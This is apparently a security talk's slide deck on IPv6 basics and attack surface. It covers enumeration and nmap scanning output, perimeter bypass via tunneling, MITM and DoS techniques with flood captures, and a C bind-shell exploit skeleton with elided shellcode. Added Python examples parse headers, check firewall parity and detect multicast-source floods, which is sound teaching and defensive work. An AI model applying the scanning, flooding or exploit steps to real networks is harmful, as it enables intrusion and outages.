IPv6 Fundamentals & Securities

Don Anto
IPSECS.COM
Who?

•   Don Anto
•   Information security manager
•   JNCIP-SEC, GSEC, GCIH, GCIA, GPEN, TOGAF
•   A dead security researcher
•   Involved in the security field for almost 10 years
•   Genius evil thinker; professional troublemaker
•   @djantoxz
IPv6 - Why?

•   Analog to digital convergence (e.g. Voice over IP)
•   The use of virtualization (e.g. Cloud)
•   Embedded devices (Smart phone, RFID) networking
•   All increase the need for unique IP addresses
•   So, more IP address space is required!
•   Finally, IPv4 Address Exhaustion
IPv6 - What?

• The latest version of the Internet Protocol (IP), intended to
  replace IPv4
• 128-bit IP addressing, instead of 32-bit, to multiply the IP address
  space
• IPv4 = 2^32 (4.294.967.296) >< IPv6 = 2^128 (3.4×10^38)
• Dotted-decimal notation is no longer used; hexadecimal with
  colons is used instead
• E.G:
   • 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092
   • 2001:470:0:64::2
   • fe80::1
IPv6 Fundamentals

Source: Fernando Gont Presentation

• IPv6 header, 40 Bytes Fixed Length
• Source address 16 bytes, destination address 16 bytes
• 8 bytes for version, traffic class, flow label, payload length, next header, & hop limit
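
The field layout listed above, as an added example that is not part of the original slides: a parser for the 40-byte fixed header that splits the first 8 bytes into their six fields and checks the payload length against the bytes actually present. The sample packet is constructed here.

```python
import ipaddress
import struct

IPV6_HEADER_LEN = 40  # fixed length, as stated on the slide


def parse_ipv6_header(packet: bytes) -> dict:
    """Parse the 40-byte fixed IPv6 header at the start of `packet`."""
    if len(packet) < IPV6_HEADER_LEN:
        raise ValueError(f"need {IPV6_HEADER_LEN} bytes, got {len(packet)}")
    # First 8 bytes: one 32-bit word (4-bit version, 8-bit traffic class,
    # 20-bit flow label), 16-bit payload length, 8-bit next header,
    # 8-bit hop limit.
    word, payload_len, next_header, hop_limit = struct.unpack("!IHBB", packet[:8])
    version = word >> 28
    if version != 6:
        raise ValueError(f"not an IPv6 packet (version field = {version})")
    return {
        "version": version,
        "traffic_class": (word >> 20) & 0xFF,
        "flow_label": word & 0xFFFFF,
        "payload_length": payload_len,
        "next_header": next_header,
        "hop_limit": hop_limit,
        "src": ipaddress.IPv6Address(packet[8:24]),    # 16 bytes
        "dst": ipaddress.IPv6Address(packet[24:40]),   # 16 bytes
        # Payload length counts everything after the fixed header,
        # extension headers included; fewer bytes present means truncation.
        "truncated": len(packet) - IPV6_HEADER_LEN < payload_len,
    }


def build_sample() -> bytes:
    """Constructed sample: ICMPv6 echo request from fe80::1 to ff02::1."""
    icmp = bytes([128, 0, 0, 0]) + bytes(4)  # type 128, code 0, checksum left zero
    first8 = struct.pack("!IHBB", (6 << 28) | 0xABCDE, len(icmp), 58, 64)
    src = ipaddress.IPv6Address("fe80::1").packed
    dst = ipaddress.IPv6Address("ff02::1").packed
    return first8 + src + dst + icmp


if __name__ == "__main__":
    for key, value in parse_ipv6_header(build_sample()).items():
        print(f"{key:15} {value}")
```
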
IPv6 Fundamentals

• IPv6 Address Type:
   •   Loopback
   •   Unspecified
   •   Multicast
   •   Anycast
   •   Local unicast
   •   Global unicast
• Subnetting
• Routing

Source: Fernando Gont Presentation
v4 >< v6




Source: Fernando Gont Presentation
v4 to v6

• Dual-Stack system to support IPv4 & IPv6 concurrently
• Tunneling mechanism to encapsulate IPv6 inside IPv4
   • 6to4, 6in4, Teredo, ISATAP
• Network Address Translation (NAT)
   • Network Address Translation – Protocol Translation (NAT-PT)
   • Network Address Translation – IPv6 IPv4 (NAT-64)
• Free IPv6 Tunnel Broker?
Security Issues

•   Large IPv6 address space (enumeration, scanning, managing)
•   The use of tunneling? The use of dual-stack networking?
•   Weakness in IPv6 itself? (protocol level vulnerabilities)
•   Weaknesses of applications running on IPv6
Enumeration
•   Discovery through multicast address (FF02::1)
•   Discovery through ICMPv6 Echo Request
•   Discovery through DNS Query (A >< AAAA)
•   Discovery through SNMP Query
•   Google helps us to find IPv6 domains
•   The presence of IPAM may help

    ipv6lab ->./alive6 eth4
    Alive: dead:beaf::3
    Alive: dead:beaf::1
    Found 2 systems alive

    ipv6lab->host -t A www.jp.freebsd.org
    www.jp.freebsd.org has address 119.245.129.228
    ipv6lab->host -t AAAA www.jp.freebsd.org
    www.jp.freebsd.org has IPv6 address 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092

    ipv6lab->ping6 -I eth4 ff02::1
    PING ff02::1(ff02::1) from fe80::a00:27ff:fe39:6f0a eth4: 56 data bytes
    64 bytes from fe80::a00:27ff:fe39:6f0a: icmp_seq=1 ttl=64 time=0.034 ms
    64 bytes from fe80::a00:27ff:fe96:da90: icmp_seq=1 ttl=64 time=1.70 ms (DUP!)
    64 bytes from fe80::a00:27ff:fe6c:ea37: icmp_seq=1 ttl=64 time=2.58 ms (DUP!)
    ipv6lab->ip -6 neigh show
    fe80::a00:27ff:fe96:da90 dev eth4 lladdr 08:00:27:96:da:90 REACHABLE
    fe80::a00:27ff:fe6c:ea37 dev eth4 lladdr 08:00:27:6c:ea:37 REACHABLE
Scanning

• Port Scanning (Tools with IPv6 support)
• Vulnerability Scanning (Tools with IPv6 support)

    ipv6lab->nmap -6 -sV -PN -T4 dead:beaf::3

    Starting Nmap 5.00 ( http://nmap.org ) at 2013-01-15 15:50 WIT
    Interesting ports on dead:beaf::3:
    Not shown: 999 closed ports
    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 5.9 (protocol 2.0)

    ipv6lab->nmap -sV -PN -T4 192.168.137.103

    Starting Nmap 5.00 ( http://nmap.org ) at 2013-01-15 15:50 WIT
    Interesting ports on 192.168.137.103:
    Not shown: 998 closed ports
    PORT STATE SERVICE VERSION
    21/tcp open ftp?
    22/tcp open ssh OpenSSH 5.9 (protocol 2.0)
    MAC Address: 08:00:27:6C:EA:37 (Cadmus Computer Systems)

v4 to v6 proxy is usually helpful, e.g. Socat
    apt-get install socat
Perimeter Defense Bypass

• Does the firewall protect both the IPv4 and IPv6 networks?
• Does the IDS/IPS protect both the IPv4 and IPv6 networks?
• TEREDO tunneling can be used to bypass NAT and to
  compromise the internal network
• The use of dual stack and tunneling mandates protection
  for both IPv4 and IPv6
Perimeter Defense Bypass

• IPv4 is well governed by the firewall using NAT or policies
• A poor firewall configuration can potentially be bypassed by reaching the DMZ over the IPv6 network
• Even worse, someone may directly access the internal network from the internet
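
One way to check the two questions above on a dual-stack gateway, as an added example that is not part of the original slides. It assumes a Linux host filtered with iptables/ip6tables and compares `iptables-save` with `ip6tables-save` output; both rule sets below are constructed samples.

```python
# Constructed sample: output of `iptables-save` on a gateway.
V4_SAVE = """\
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p icmp -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
COMMIT
"""

# Constructed sample: output of `ip6tables-save` on the same gateway.
V6_SAVE = """\
*filter
:INPUT DROP [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p ipv6-icmp -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 3306 -j ACCEPT
COMMIT
"""


def parse_save(text):
    """Return (chain -> default policy, set of ACCEPT rules) for *filter."""
    policies, accepts, in_filter = {}, set(), False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("*"):          # table header, e.g. *filter or *nat
            in_filter = line == "*filter"
            continue
        if not in_filter:
            continue
        if line.startswith(":"):          # ":INPUT DROP [0:0]"
            chain, policy = line[1:].split()[:2]
            policies[chain] = policy
        elif line.startswith("-A ") and line.endswith(" -j ACCEPT"):
            # Simplification: treat ICMPv6 as the counterpart of ICMP.
            accepts.add(line.replace("ipv6-icmp", "icmp"))
    return policies, accepts


def parity_findings(v4_text, v6_text, chains=("INPUT", "FORWARD")):
    """List places where the IPv6 rule set is more permissive than IPv4."""
    p4, a4 = parse_save(v4_text)
    p6, a6 = parse_save(v6_text)
    findings = []
    if not p6:
        findings.append("no IPv6 filter table loaded: IPv6 traffic is unfiltered")
    for chain in chains:
        v6_policy = p6.get(chain, "ACCEPT")  # kernel default when nothing is set
        if p4.get(chain) == "DROP" and v6_policy != "DROP":
            findings.append(f"{chain}: IPv4 policy DROP but IPv6 policy {v6_policy}")
    for rule in sorted(a6 - a4):
        findings.append(f"IPv6-only ACCEPT rule: {rule}")
    return findings


if __name__ == "__main__":
    for finding in parity_findings(V4_SAVE, V6_SAVE):
        print(finding)
```

Rules that match on addresses differ between the two families by nature, so they show up as IPv6-only entries to be reviewed by hand rather than as confirmed gaps.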
Exploiting - Protocols

• IPv6 was also designed to improve on the security of IPv4; unfortunately,
  there is no significant improvement
• Some problems in IPv4 still persist in IPv6
• Man In The Middle Attack
• Denial of Services Attack
• More and more
Man In The Middle
 •   Spoofed ICMP Neighbor Advertisement (replacing ARP in v4)
 •   Spoofed ICMP Router Advertisement
 •   Spoofed ICMP Redirect or ICMP Too Big to implant routing
 •   Rogue DHCPv6 Server (replacing DHCP server in v4)
 •   More and more

Source Image: OWASP website

Used to help packet sniffing
Denial of Services
 •   Traffic flooding with ICMPv6 RA, NA, NS, MLD, Smurfing
 •   Prevent new IPv6 address with DAD
 •   CPU Exhaustion with ICMPv6 NS and a lot of crypto stuff
 •   Routing loop attack utilizes automatic tunneling
 •   ICMP attack against TCP to tear down BGP session

anto# ifstat -b
       eth0
 Kbps in  Kbps out
 9851.48  1.08
10244.34  0.95
10313.33  0.95
 9165.56  0.95
 9358.11  0.95
10165.01  0.95
 9802.98  0.95
 9353.34  0.95

anto# tcpdump -n -i eth0 dst host dead:beaf::3

20:39:48.442267 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442290 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442314 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442337 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442585 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24

4700 packets captured
4884 packets received by filter
93 packets dropped by kernel
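
In the capture above every echo request carries the multicast address ff02::1 as its source, which no legitimate host does. The following added example, not part of the original slides, flags such packets in `tcpdump -n` output. Five sample lines and the trailer line are taken from the slide; the three unicast-source lines are constructed for contrast.

```python
import ipaddress
import re
from collections import Counter

# tcpdump -n line: "<time> IP6 <src> > <dst>: <summary>"
LINE_RE = re.compile(r"^(\d\d:\d\d:\d\d\.\d+) IP6 (\S+) > (\S+): (.*)$")

# First five lines and the last line are from the slide; the three lines in
# between are constructed here as legitimate traffic.
SAMPLE = """\
20:39:48.442267 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442290 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442314 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442337 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442585 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:49.100000 IP6 dead:beaf::1 > dead:beaf::3: ICMP6, echo request, seq 1, length 64
20:39:49.200000 IP6 fe80::a00:27ff:fe96:da90 > ff02::1: ICMP6, neighbor advertisement, tgt is fe80::a00:27ff:fe96:da90, length 32
20:39:49.300000 IP6 dead:beaf::1.51515 > dead:beaf::3.22: Flags [S], seq 1, length 0
4700 packets captured
"""


def parse_addr(token):
    """tcpdump appends '.port' for TCP/UDP; strip it if the bare token fails."""
    try:
        return ipaddress.IPv6Address(token)
    except ValueError:
        return ipaddress.IPv6Address(token.rsplit(".", 1)[0])


def find_multicast_sources(lines):
    """Return (hits, per_victim) for packets whose source is multicast."""
    hits, per_victim = [], Counter()
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # trailer lines such as "4700 packets captured"
        ts, src_tok, dst_tok, summary = m.groups()
        try:
            src, dst = parse_addr(src_tok), parse_addr(dst_tok)
        except ValueError:
            continue  # not an IPv6 address pair we can interpret
        # A multicast destination is normal; a multicast source never is.
        if src.is_multicast:
            hits.append((ts, str(src), str(dst), summary))
            per_victim[str(dst)] += 1
    return hits, per_victim


if __name__ == "__main__":
    hits, per_victim = find_multicast_sources(SAMPLE.splitlines())
    for ts, src, dst, summary in hits:
        print(f"{ts} multicast source {src} -> {dst}: {summary}")
    for victim, count in per_victim.items():
        print(f"{victim}: {count} packets with a multicast source")
```

The same property makes a simple ingress filter: packets with a source address inside ff00::/8 can be dropped at the perimeter without affecting legitimate traffic.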
Exploiting - Apps

•   Buffer Overflow
•   Remote Format String
•   Off-By-One
•   Web App Attacks
•   More Attacks?!
•   There’s no big difference
•   Socket programming & shellcodes

      char shellcode[] = /*Portbind @ 4444*/ "...";

      /* AddrInfo is an addrinfo list (as returned by getaddrinfo()); each
         entry carries its own address family, so the same loop serves
         IPv4 and IPv6 targets */
      for(AI=AddrInfo;AI!=NULL;AI=AI->ai_next){
         if((s=socket(AI->ai_family,AI->ai_socktype,AI->ai_protocol))<0){
            printf("can't create socket\n");
            exit(0);
         }
         connect(s,AI->ai_addr,AI->ai_addrlen);
         send(s,buffer,len,0);
         printf("Check your shell on %s TCP port 4444\n",argv[1]);
      }

v4 to v6 proxy is usually helpful, e.g. Socat
    apt-get install socat
DEMO
Discussion
Thank You
